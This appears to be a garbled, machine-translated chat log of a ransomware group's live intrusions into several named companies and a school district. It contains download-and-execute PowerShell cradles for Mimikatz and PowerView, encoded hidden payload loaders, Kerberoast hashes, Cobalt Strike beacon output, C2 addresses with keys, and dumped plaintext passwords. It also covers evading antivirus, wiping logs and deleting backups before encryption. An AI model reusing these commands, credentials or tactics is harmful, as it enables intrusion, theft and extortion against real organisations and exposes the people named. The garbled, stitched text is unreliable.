mapciasp.com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amAccountName : sccmservice DistinguishedName : CN=sccmservice,OU=Service Accounts,DC=mapciasp,DC=com ServicePrincipalName : MSSQLSvc/ASPSQL02.mapciasp.com TicketByteHexStream : Hash : $krb5tgs$23$*aspsql2svc$mapciasp.com$MSSQLSvc/ASPSQL2.ma pciasp.com:1433*$7FBB03B44CB498CEA3660DC0F17F4326$CEB193 BE15A7B0299BEBE7BAB2A50A7A53EA924FC555D8111667F9AB4DE458 B220F36F08A7E3B1965BBCA55CF7F09F1EF255AD630BAC1580000E3A D222A320D342DB4BC833E2E4C257E52553197BD338DEFB57B236C9E6 192090C832A419E665B511163E0BAFAA90690232DDE95A5650F6A6B8 FD5C78FD5E49EC4879816F7441971213D2861AD7E20412C549CC8517 677D53552B83756A2F54BAEB38497F60E8D7EB60B9D7A19BFF495016 06FDDE848E2DA8B8A128BAB34C77FFF5AEA18D130C6C2818877EF059 FB0009A8DAFE7C03028C02DDDE72672BB4E09BFBD6F6B91AFF72C0E4 5203A12307CE38D4CFAAF48CC5B1D000E68C11BEA41766B207657EE1 5BF5115CAEE8B5F42AC242857F921DC68963365579AB5245A9A261D2 EB551E5E8FEA013839D1AA991483C2EF6FE3117974AAD6D6E6E358D4 A3AF20F6760C5AA13A6BAE5CA8DFA9E2941744D664212581A6206695 AC7D817F4F6A0114E5FC5CDF87BB5F3887C24DC31A71EBC0BF75C668 E6BC1F422AC0E38D06570948272E87E7D532BB690EE6F62287866ABE D4B45B094F37AD2256A971BDE09F18628D8E700FE5FA66402B0F656B 03FFBCE97D66E7035A7704A341E05B78F627CA42BC06C0154B403388 9E7475B1B10D442A54F9F95E3AE67260DE4FAB6226B210FC0CA67DA8 785B42B01F1D84BAC9CA7860DFBAD717E7C91B6A2FF53CA7AFCDA035 3EA35435695B3A98C5069BCE59BB83F2CFEEB3AB2C8A094D3DAF595B DC8D4E347736B6B635B2B73EA4F10655F3FA44FEE38B78B2F42BB2FC E531C0C66634D142CDC6C4C806733AF8CC250DE2234C9D7258901857 49502387C090BE6CB3AACE649D3D9274A7EF3838E876DDAC9563A29B 8E41E0EB541FE0306E999AA669293B6EDE8CC708EBD73060F093490A C226A3F55C79E2376EE53B1053544A20F977EBC9A9296276B52905BE 0B63371C951FFDF6A65D297EBBFF81902B8F2DA42675A36C45F11C22 B141782F7512AD8363C23BFF25E4EF91D69386F39E1F630795B3FFA5 C93758C3503AC41EE6F89ACA8A60A8F3F208DE85DD24825BEEF1C13B 17D17C6C33B73A2787BCE9D4A79CCFF3AACD9516EA2ECF88853555D6 
62E46125B0CE00B2EDF5E0D24C18D5DADDA81973EB4ED03FAB5BD2B6 C9F9D06BD5CB5B97EABF2689AC617031E51035D7FC6D33417CCA79A5 BF405F8063EDFD057F63554133F5E507992D982CDA68B08BD7C6B923 31ACCEF2AE62F47BD978E62178C95D2791D458686E171F1B3DEF886A CCC76ECE68757CFED83296882DE9819A7D0DC6460E6E797DEF03CCD8 137E0B7DAF02F42FE1C14B0C60E86048961D658AEAF2E6740887981C 193082C4457CEAB32102095245195C2F9848883CDE9AF1BEAC622FDC 7590C0E255935455514560BE4ABB64F073754891F3F6D646B3CC1FB7 F6307A48BA84B7B91944190C0D8BA963AB91ABF9F52EB5ECE6101FF7 9934DC488320CE690433C4661431B0134C0B05511D7BF19EBFA4AD92 BA15E3871E7F32D8177612D05A1FB6F9917629B21B13CC009A073259 88E2526171CF5ECE69974CCEEE9B2D63932F9A85A1974A90A840C91F 14AEFF37F45A82E5F1A66276B0220977F73B445DEB06F63F458A80BC 4CF09C2E372D15E0141AD31F0910FCE19C7DD5003EE475ACD92A6DCB 0383DE61A278 SamAccountName : aspsql2svc DistinguishedName : CN=aspsql2svc,OU=Service Accounts,DC=mapciasp,DC=com ServicePrincipalName : MSSQLSvc/ASPSQL2.mapciasp.com:1433 ``)))pay attention yes yes without comparisons you can see and compare the payoffsvote both linksix ((New-Object System.Net.WebClient).DownloadString('https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'));`` iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Invoke-ShareFinder.ps1')); ``This is the script from the git https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1 As a consequence in the current session you write Invoke - something you've downloaded and bang it works[ ](https://mediaeveryone.com/group/mapciasp-com?msg=NvfCtE6foxs9WBEAY) here's the url of the script command above - just load it into memory without physic drop `` ``. C:\projects\default\temp BBCTX6 @ MAPCIASP\bbbwalkerj EULA.ps1 The term 'EULA.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 00:00.0058 ``Running scripts by filename? ExactlyNo one)``And who says it's issued once an hour? powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AawBKAGYAWAB0AHYATwBsAGIAdAA5AHIAVAAzAFYAWQBqAGUANwBBADQATQBxAHUAaABiAEcAOQByAGIAbgBjAHIAQQB4AHoARQAzAGMAdQAnACkAKQA7AA== ``You said you couldn't load the same load twice so restart the script in the current session for 40 minutes``. iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/')); ``Workingwithoutit``. powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AMwBrAGUANQBhAHgAWABFAGUAdQBLADkASQBtAFYAMQBCADMAYgBwAHcAQwBRAGoAYQBCAEMAYwBoAG8ARQBPAG8AdwBUAGEAWABHAGQAbwAnACkAKQA7AA== ``1 load 2 times you can't throw the load unique? check the session in tpshAnd you can't import it as a module eitherGood question, I don't know. But you can't use Invoke-Kerberoast.ps1 because ps1 is closed. So if there is no scripting on your machine and there are no modules in ps then how will it work if I import kerberos there?this is how tpsh takes the scripts load in itself.Did you try running the scripts close what scripts? any other ideas? there comes da@tl2 this https://wideio.com/USA/6LG8Ean3mNZcWV4Zk4E8A01XYmw2NOfxva5pgZVUWcjnAvyD60q45b991yG0/dashboard@tl1 have you tried pulling in tpsh ? 
i have access via ps and cmdkxxm I can't believe avg and defender is so evil...even injecting it into a delta process won't work..Trying different loads, session will go to the armitage and then will fall off. No seftikatz, rubius or kerbiroz type stuff to load, tears it down right away. Run ps scripts locked. for me textmodify files for themselves net localgroup "Admin" ``. Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator MAPCIASP\Domain Admins The command completed successfully. ``output with /dom``. The request will be processed at a domain controller for domain mapciasp.com. Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator aspprinters bbrooks bkupagnt Domain Admins Enterprise Admins ghouser mkline rmiller sfoster The command completed successfully. ``If I pull files from each conf 10-20 lines I will die in the number of files on the systemTo be able to search if necessary, and not fuck with the page loading in this chat.Why files about DA EA LA in ad_user 829 Objects go to 1000 users? in #general also wrote how to search historyThere is no, search for the drive file is not, check and if there your traces - clean up`` `` History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt . ``Do you know that ps stores the history file on the system? On your own dedicec yes, it's connected via citrixts on the rdp? 
Target : MS.Outlook:bwalkerjr@birniebus.com:PUT Comment : USERNAME_TARGET_POINTER UserName : bwalkerjr@birniebus.com Password : @@CuAAAiBwdAEGAsBwaAUGAyBgaAIHAABgYAkGAyBgbAkGAlBgYAUHAzBgLAMGAvBQbAA CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 3/2/2020 8:58:29 AM Target : mail.krapfbus.com UserName : bwalkerjr@birniebus.com Password : CredentialType : DomainPassword PersistenceType : Enterprise LastWriteTime : 3/2/2020 8:58:29 AM Target : bwalkerjr@birniebus.com UserName : bwalkerjr@birniebus.com Password : CredentialType : DomainPassword PersistenceType : Enterprise LastWriteTime : 3/2/2020 8:58:29 AM ``Mb external domain birniebus.com where are they? Through cmd and psa how do you work there? Trying to get, seabelt and data on YES I know that @user9 has yes I asked how many with YES networks not up@user3 have you with YES network?[ ](https://mediaeveryone.com/channel/general?msg=idsBNFAZrjwCKbFNG) I said no doubt about it I can't say I have 1 YES real network 1 network.and tell me how many networks we got with YES which without a doubt are normal networksI'm working faster colleague I'm working 3 more people +++ no more new sessions so all worked out what was it?or not .... bullshit what's it going to be like labavo no login, it looks like there's no freebies there + mostly 7/hrs don't like it i don't@user9 ?no trusts you say ? do make a confrashash.com - make a confrash plzstateoilcompany.com - strange network 34 users, 66 computers, no trusts can i getstateoilcompany.com ?I'm not sure if I've got a new one, but I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one.com I'm still the only one who works with it? 
ballymoregroup.com confab check it out guys there is a session with a local admin zazl not touching it priorityes it but I took ballymoregroup so what to take, zazl or ballymoregroup? ballymoregroup take it to work there's a big case can be for two at a timeadinfo taken off still get a taxi? well, i did not believe it) `` >mail: tyler@gaudyme.com ``Ah ouch''. >userPrincipalName: destineeg@DressinGaudy.local ``I do not believe it``) in adinfo suchDressinGaudy.local more +3 sessions and configs too from that domain there are 3 cars 2 has a client, but configs on them do not see and they are now dead on the last client does not sit sitbelt is silent? config and does not smell of it in bluegrays alive there is a computer without a client vpnapodlecu who took rtpcompany.com there is a second session you do not write in the comment your domain koba, there is written externalnikBK new bots 15pcs[ ](https://mediaeveryone.com/channel/general?msg=MgtwStYbXqTWFDJkj) do confuber work take whoever.com10 minbrbr newbots are in bkHowever sexy all off that you can kidajeet still sessionsfrom him on the tachka look for vpnno have bluegracegroup.comadinfo no as not visible domain[ ](https://mediaeveryone.com/channel/general?msg=oQMWyvPFBzY3xipch) hurriedly))com`brighthorizons.com` confi pleaseDo spav https://neteric.com not come[ ](https://mediaeveryone.com/channel/general?msg=FfcCPvXueqb75SfzY) you'll laugh, but in adinfo no external domain if you pick up then writekobel.com - confi already forgot how to do it? domainvneshneed to give confi TomHolzerFord.local[ ](https://mediaeveryone.com/channel/general?msg=ET5DAcd6gWFrqMsfh) take awaykobel.com take away here in the netcob and work[ ](https://mediaeveryone.com/channel/general?msg=Kw5w8z6gz9EsRLCTt) here sessionsAnd work with what? 
mine by the way, flew in, although before did not want to..they clean daona empty the rest in shit after closing the gridthere are only 2 no personal took away74.118.138.118 https://neteric.com ---------------------------------------------------------------------------------------- 104.243.44.69:13574 Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7 pf,hfk`` 74.118.138.118 https://neteric.com ---------------------------------------------------------------------------------------- 104.243.44.69:13574 Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7 `````` 104.237.4.48 https://valcp.com ---------------------------------------------------------------------------------------- 199.127.61.214:33914 WLzR0eDj5HH5PGAwCkOn9Dv2byQT64cQ3GY ``Divide into groups by the way a couple of cubes workers are red, so where there was already spawn do not touch`` `` 199.127.61.123:15724 npUPwGS5AK1pPU6W6ZxmvzzkdhsqzqaRFWa ``Get the cobb up? oh, what a good time to fix it, you know you have to take it before they fall off if you already have a session in the cobb da fuck with this microtic, will soon be ready to do what?general alg you already know) Okay, but I want the map to reflect the nuances of the situaDa rdp came and raschal Well I can describe here is how it was today So there's a situation review later or how to be with non-attractable servers How to be on the server without charThere are now busy problem with the internet and here is the motive for the question just so you do not get mixed up in the algorithmto leave all if it helps youI am an artist I see so This is my vision a, even so the right algorithm on the left tips How to start Well, the beginning of this turn in a token can take the command outside the map true, to reduce the size you're still at hand bats and so dto leave it if you understand and 1 line is a turn in the token) the beginning of the map turn in a tokena little strange you got a ok if offsets av and stuff like that why? 
faster would be to scatter ephemera I think the same way from 100 mapping in both cases and if you have not found it, then only mapom if 100 then it is better to otkl av + win def and scatter ephemera if to 100 servers you can get along just the same only mapovoretically there is an important aspect of this?so will dozabyla forgot i do not see the division to 100 servers and from 100chem to change? report as a router will beroadmap, waiting for a routerpodobytesya what to do so i will add you a new tul `https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion` please send me your names from here. 23.19.227.54 https://urlbig.com ---------------------------------------------------------------------------------------- 45.126.210.66:22514 cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe ``Well, I don't remember the hostname and I can't get into the koba yet.`` now throw the kobu in the history of bicon no unions do not see `` beacon> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered. 
Status Local Remote Network ------------------------------------------------------------------------------- Unavailable G: \10.10.34.201\c$ Microsoft Windows Network Unavailable H: \10.10.34.242\c$ Microsoft Windows Network Unavailable I: \10.10.220.95\c$ Microsoft Windows Network Unavailable J: \10.10.220.67\c$ Microsoft Windows Network Unavailable K: \10.5.68.232\c$ Microsoft Windows Network Unavailable L: \10.91.18.5\c$ Microsoft Windows Network Unavailable M: \192.168.0.59\c$ Microsoft Windows Network Unavailable N: \10.91.18.21\c$ Microsoft Windows Network Unavailable O: \10.10.30.64\c$ Microsoft Windows Network Unavailable P: \10.10.35.60\c$ Microsoft Windows Network Unavailable Q: \10.10.34.222\c$ Microsoft Windows Network Unavailable R: \10.10.39.180\c$ Microsoft Windows Network Unavailable S: \192.168.254.156\c$ Microsoft Windows Network Unavailable T: \10.91.18.76\c$ Microsoft Windows Network Unavailable U: \192.168.0.86\c$ Microsoft Windows Network Unavailable V: \10.10.72.247\c$ Microsoft Windows Network Unavailable W: \10.10.35.101\c$ Microsoft Windows Network Unavailable X: \10.10.35.85\c$ Microsoft Windows Network Unavailable Y: \10.10.73.9\c$ Microsoft Windows Network Unavailable Z: \10.10.72.139\c$ Microsoft Windows Network The command completed successfully. ´you gave the cob above I thought it was she and isto me to compare it nowhere else exactly where you mapped to dumping) ah, so you need to throw the coba, so immediately would have said)) and check whether the maps remained after I wanted to see the place where you pamiely before dumping.she and I was interested)in the coba no net or no in the coba? 
because I may have it in the one that fell off mapiltekonnect only in myteb no at allTESTCONNECT.lrhc.losal or here do not remember exactly, but here like mapil TESTWEB.lrhc.losal to check if they are still there I am interested in the host where you mapped from the list ``` 10.91.19.195 10.10.31.42 10.10.39.148 10.10.35.118 10.10.220.202 10.10.35.19 10.10.80.102 10.10.220.88 10.10.222.38 10.91.18.34 10.10.34.187 10.10.34.183 10.10.30.154 10.5.68.126 10.10.222.61 10.91.18.94 10.5.68.241 10.10.221.21 10.10.220.59 10.5.65.51 10.10.220.41 10.10.221.17 10.10.35.137 10.10.73.6 10.5.67.49 i want to check if there are any mapps left before the cipher started, then i went to another cipher and told him that the first koba fell off and there mamapilosya not kobamapi in question because the vpn fell off and did not have time to check this is it? 23.106.215.165 https://palside.com ---------------------------------------------------------------------------------------- 199.127.60.23:57230 b5b9BPVoH7jnJt2OEQlUbLxxjvXOvoKa4Ue ``now there are no cob connected to the hostname where mapped before the collapse did not have time to check the case when the cob fell off? to the question of this ``arms: 791/1040 mapped, the cipher in question `` with a possible extension to 12 by the time until 10 we have until what time today? in order for you to estimate this time when closing large volumes of data and general info: cipher speed ~20-40 minutes to 1tbokay+ all understand?yes, understood? 
there is 1 main domain and several secondary domains and you estimate these links as default between all domains you forget to analyze the bundles of domains from small comments look at his circle of users by group and see more tróós poznachennyh people in the network, also important to watch and there were interesting files on the computer and among them already found chrome login: root pass: -you then discounted a memberof one Dan would have been longer if you had not given a tipI thought I would have to spend my last day off to work) for Saturday solved the problem with the spheremodelshafto immediately I want to mention such moments as reseche network on that probably all and put off the network after all servers have pulled in already will not work that will extend your online lifetime for an hour or more just times less you will still noise whether or not it and immediately this question if you have + + idea is understood?the main thing is that the server is unreachable, the calls of employees are unavailable, everything is slow, the network is frozen, another conversation it's like, until you log on and go to the snaps section, if admins are so pedantic that they go to check snaps every 10 minutes or they might not get it?I understand that it's a scare on the net, but when we've already shredded the avs, lost snaps, does it make sense to hide?or will not notice that the network freesitka how long the admins will not take a head360k requests per hour500 requests every 5 seconds excluding your internal (a la mapping and vmik to open)100 servers in the network and while you work with them 1 hourk how it works on the numbers just so you understand that the client dropout is not simple ping it quite a full-fledged request in the slip because inject should be done almost simultaneouslyeven if you worked in a command and while I was pulling the other mappings to the servers are already drawn and while pulling more additional servers, the old flurry you pull N 
servers at intervals of 5 seconds such a remark to us still have comments on the grid, other than the server stall?))mapper228+)))mapper? without lukashenko228 only adequateyou have the ability to choose a name for the alias, not critical it will be without graphics as I do not think it is necessary in this case if you want such a format - yes there can be a cna script, which is given a list of ip, separated by comma, and it matches these ircons in a specified session this optimizes the time spent on the stage map arms result of processing you know and each server copy line by line ` `) execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full ``Do yourself a blueprint of this command and you will see where you want it to go (text editor), and it will work like this: ``execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full` + now will be in development Marregvash task to make this map taking into account such small things as "the server does not open what to do "even just to 100 and from 100ya want you to get away 2 main outcomes: up to 100-150 servers and above and while you do not have internet you will take up writing roadmap for the process of running the build2 item my fault3) or you are nervous or something, but you forget too basic things2) our process in such cases is terrible1) I want to thank you for the process, the network was hard and unaccustomed, but you did it judging by the statistics and you need time to work the build itself you have 2 hours at 
most and speed up please for what) in the future I will know, thank you alwaysDOMENCHts not specified in the hostnameask a comrade easier) you have 5 people around what exactly is not configured as follows ?help him helpcolleague still does not know how to configure a sheet for coba go to the confab+@tl1 all here hello4 min max I just a little bit and all will soon be when? soon all will soon all not yet in place? good morning nets still scanmedr, backups, in centers, etc. all ready? here's more what found)`We also copy them to WORM tape daily, with indefinite retention. The tapes are kept in a fireproof safe at the NOC.What tape?only remote-exec returns nothing like remote-exec psexec ADM-NAS ping google.com -n 1 can you check if the remote computer is connected to the internet?he kind of need to order beforehand, I mean the crap that encrypts files)) assemble the dll? what is it, by the way, with the cryptor? + looks for non-domain ports subnetwork what ports and why? scan portsport servers, scan user subnetsuser7 Well, yes, get a colleague to help and 410 subnetwork where users sit :flushed:It seems that the delay - yesterday 60 something servers were pinged, and today over 200. I need to re-sort as usualDo you want to make a new raw? I haven't noticed, I'll do it now if you haven't noticed when you build a .bin file its hash is always differentDo you just give me a new raw what kind of shellcode is it? i can't pull anything from the lab yesterday because i can't pull anything from the test lab because dllvmi is off, psec works, but the session doesn't come specially i'm not pulling, i just jumped from user's car to dk and had to try and find where it'll let me go..and why do you pull? no, just not all can pull, in particular PDK can not you pull all the servers in the coba or what to do with servers that do not come with the session? add me to his computer froze, now reboot ... who in the group to give? 
Domain = cn.net.ntes In adusers mail = mesg.corp.netease.com ``A couple more+you'll have sessions? \you have a name for the conf+? @user3 give kobu nearer to 2 will kobu be ready da@tl1 New sessions will be there? what progress? by 10 will be new sessions as a variant it is possible to get on dk through rdp for example if it is allowed it not da)is there any kredes?:thinking:? then this user can jump to dk if there dk is a dk they say the french mikat Authentication Id : 0 ; 63768393 (00000000:03cd0749) Session : Interactive from 0 User Name : nddevbernst Domain : JDOSSN Logon Server : JDODC64 Logon Time : 10/23/2020 2:15:49 PM SID : S-1-5-21-3450394983-289173729-1299264434-241049 ``in the output mimic or in the ad info? is that where the user went? logon sever in the output mimicwill ask in an hour still in questionnew by how much to expect? old are theresessions working?good afternoonfaeray admin is likely to be the main technician(s) make sense to pull other machines? the current machine (dk) have already searched up and down for files related to FireEye and have already read all the counter .xml and .txtladno it is the practice of saving on the number of agents in general EDR very often are not installed on workstations, but they are on the serverh Then I saw the assumption was based on the fact that I did not see the process of FireEyeexplain please I do not understand the logic of the assumption based on the check of the users machines? I assumed so, and you say there is no it and look admin on DK and the two servers I wrote above exactly and it runs in FierEye process is called xagt.ehem [+] Determining what EDR products are installed on USHDC1-CSPADS02... [+] host called home, sent: 63 bytes [+] FeKern.sys Found [+] 1 EDR Products Found! ====================== | Vendor Information | ---------------------- [+] FireEye Found! ``dalf? Is that what it is https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cnaEDR_Query shows on the firewall at that? 
there are 135 computers and all the servers? no firewall agent either? in the ad_users search: tech, it, network, etc. SharpSniper showed where two of them go, FireEye is not running thereEDR as I understand it is missing, based on: https://www.anti-malware.ru/security/endpoint-detection-and-response FireEye, as I understand it, either knocked out or not usedokjr only win defenders checked - not if in the process on the servers does not hang, so it is oldI guess it is either disabled now, or old and no one removes itFireEye is AV, right? a, the directory is[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vcDBBToC2L6hZJp3) but there is no process, no directory from it, AB can not identify sitbeltwas still installed FireEyesitbelt did not withdrawAB as I understand only win win defenders will be in kobezaberikorocha closed like a shop, this user changed the pass and session hung up, can not get a new raise-change these guys YES passwords?so do not unnecessarily noisydskink throwing tom domain sootv already removed a couple of critical pkv tom domain already work, as you prepare, I will give you a session from 2 domainsvot yes from that domain) ` `. overland.com\dynamics:bobc@t! overland.com\Administrator:Vi3wSon!c overland.com\mahesh.admin:Changeme! overland.com\zerto:CR@CKer$ ``To dk from the main working domaina to the domain how to pass) CRCKer$`` Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data: Reply from 10.69.0.35: bytes=32 time=10ms TTL=127 Ping statistics for 10.69.0.35: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 10ms, Maximum = 10ms, Average = 10ms beacon> portscan 10.69.0.35 445 none [*] Tasked beacon to scan ports 445 on 10.69.0.35 [+] host called home, sent: 93285 bytes [+] received output: 10.69.0.35:445 Scanner module is complete ``Nothing to remove here, it's a prod segmentetad, dxink and so on to remove themselves or is there? 
the main domain near you are in the trust prodovom, do not touch it immediately do not rushschellyn.comdomain kobydavay+may offer another network to work until the news? do not remember, I think I saw where something i'll try the pass if you have it) do they have outlook clients? no, the pass does not fit, the ones i've tried the rest before the weekend user8 tried, but i don't know what he had there2fa? in the mail access to the neta with the mail we have what? browsers directly from ALL computers, also nothing else check the files, so far nothing (checked sccy? eight? One quit[ ](https://mediaeveryone.com/channel/general?msg=nxpga4pHxRxHF6qxv) 4 in scythe all off, even in the center ping goes nowhere, domain is not available may well lie useful dokuoksche pay attention to file servers in IT folders let's write back as you check it outcross-check the files, nothing left thereThere are no browsers on all the machines I think the chance is high enough5 people in a working day can find accesses?There's still no found the creeds from the nasovi then give out a couple of vpn, but there without direct accesses. will have to fuck then let's close the sccy then sccy- on belemor have creeps ?snu.edu deadlockedIt turns out that only sccy and snu.No new sessions will be available today? sccy seems to be a couple of sessions alive now checking skytech, there are a couple of sessions there-is there anything alive in `CORP.TELEVISA.COM.MX` ? what to work with today? where are you all already here? it's not like there's a lot of you hello hello http://172.17.70.13 Banner: nginx http://172.17.70.13 HQNAS3 - Synology RackStation http://172.17.70.14 Banner: nginx http://172.17.70.14 EVO HQ NAS `````` http://172.17.70.16/certsrv/Default.asp qlyons applecherrypenguinski `````` 172.16.1.35:53 172.17.70.7:53 172.17.70.8:53 ``cheech.evo.local 172.17.70.16 - ``here somewhere I checked the mail through cme, also no net with the current domain? 
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mherna02:Disney Land1', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\odomin:RaspberryPies made in 1911 is not good', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmagent:un4seenconsequences_', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\tylerservice:Ty1er$erv1ce7845_', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\bross:!World domination2019!', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\ldelar:Lnd088034', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\munis:Mun1$5623!', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mzuvan:Logitech45W', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\papercutservice:romeo25-', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmsvc:0mnicrom-', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mandl:ententeich,', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\pgalde:$uper_0lb@P!!!', [-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmadmin:juliet25-', ``most likely it will separate 1 space without a clue`` good question ``juicy cum`` or ``juicy cum`` will consider it as a password ``if there will be an example cum_login will define it as one whole password with a space`` I put it in quotes in the file simply domain is better not to write in a file I ask about that if there is a space in the password there without domain in any case ``you`ll be on LA USERPASS_FILE no File containing users and passwords separated by space, one pair per line ``and the domain is separately specified in the user:passuser pass module that's the way it is)) there's just a space there, is it :CLEARTEXT:? just don't remember if it will or won't understand it? through the file most likely cleartexts yes if you shove them in USERPASS_FILE in smb_login, will it understand quotes in passwords with spaces or will it think that the quotes are part of the password? 
``` sisd.net\mherna02:CLEARTEXT:Disney Land1 sisd.net\odomin:CLEARTEXT:RaspberryPies made in 1911 is not good admin.sisd.k12\sccmagent:CLEARTEXT:un4seenconsequences_ admin.sisd.k12\tylerservice:CLEARTEXT:Ty1er$erv1ce7845_ sisd.net\bross:CLEARTEXT:!World domination2019! sisd.net\ldelar:CLEARTEXT:Lnd088034 admin.sisd.k12\munis:CLEARTEXT:Mun1$5623! sisd.net\mzuvan:CLEARTEXT:Logitech45W admin.sisd.k12\papercutservice:CLEARTEXT:romeo25- admin.sisd.k12\sccmsvc:CLEARTEXT:0mnicrom- sisd.net\andl:CLEARTEXT:ententeich,, sisd.net\pgalde:CLEARTEXT:$uper_0lb@P! admin.sisd.k12\sccmadmin:CLEARTEXT:juliet25- ``don't polucht only and brutt try the current admins as local there on dki adjacent polzaky not passed if there is no enterpricesucha look for access in the other domain so far datak, here all ready get it?in the name vcertnu then there is probably not. it has what signs? and in the center? a bunch of hypervisors found? then dvcertnu virtualization center or what is it? vcertnu in the center is what? in the center and stuff found?) well, put it out?) yes, also got it) huh... i'll scrap the ports... work your way up the wpn. the locker will get through cb - there's more proactive than auto blockingChecked all available armas everywhere cbChecked all servers with cb maybe they'll find a way to break into the network not sit long first thought he was without it, when i pulled the session saw that he was there found a server without cb? 
* Username : veeam_vss * Domain : EVO * Password : rhR7m1T3ZnhB wdigest : * Username : tcooley * Domain : EVO * Password : SammySeveDog44 kerberos : * Username : tcooley * Domain : evo.local * Password : SammySeveDog44 wdigest : * Username : qlyons * Domain : EVO * Password : applecherrypenguinski ``` wait for builduser7 then we will close todaya, there is still a daughter YES in google with 2phmail in the softcloud the rest of the passes do not fit, the mail in general has access to the general manager, some operator and an empty mail is given to the mail is there info? well not a dump, maybe important files, planes build all the same judging by the name, perhaps there filewash look We found everything but the access to one nasa. there are two disks, one (Mechanic_Library) is not accessible this one is nowhere to be seen in the files / browsers coba in lsnado will be a new coba today no pulls ok, a couple of hortbits and die SI-SCIP01: 10.0.2.120 SKY-SQL: 10.0.2.129 SKY-BEUZA-01: 10.0.2.20 SKY-DC02: 10.0.2.11 SKY-CRM: 10.0.2.10 DMW-PRINT-PC: 10.0.6.75 SKY-BEDMW-01: 10.0.6.13 SKY-DC04: 10.0.6.27 MTN-PLAYER-PC: 10.0.1.180 `````` MTN-PLAYER-PC SKY-MGT SKY-BAL SKY-TS01 SKY-TS01 SKYDC-RH SKY-DCPS UZA-DERRICKW-PC UZA-DERRICKW-PC DMW-MANDYF-SURF DMW-FRONTDESK2 DMW-CHUCKM1-PC DMW-CHUCKM1-PC ``hdavail.comhello everybody hello everybodyuser4user8 This one we don't have access to, the others do ``` Shared resources at \10.0.6.83 LS520Dc5f server Share name Type Used as Comment ------------------------------------------------------------------------------- Mechanic_Library Disk Mechanic Library Public Disk The command completed successfully. 
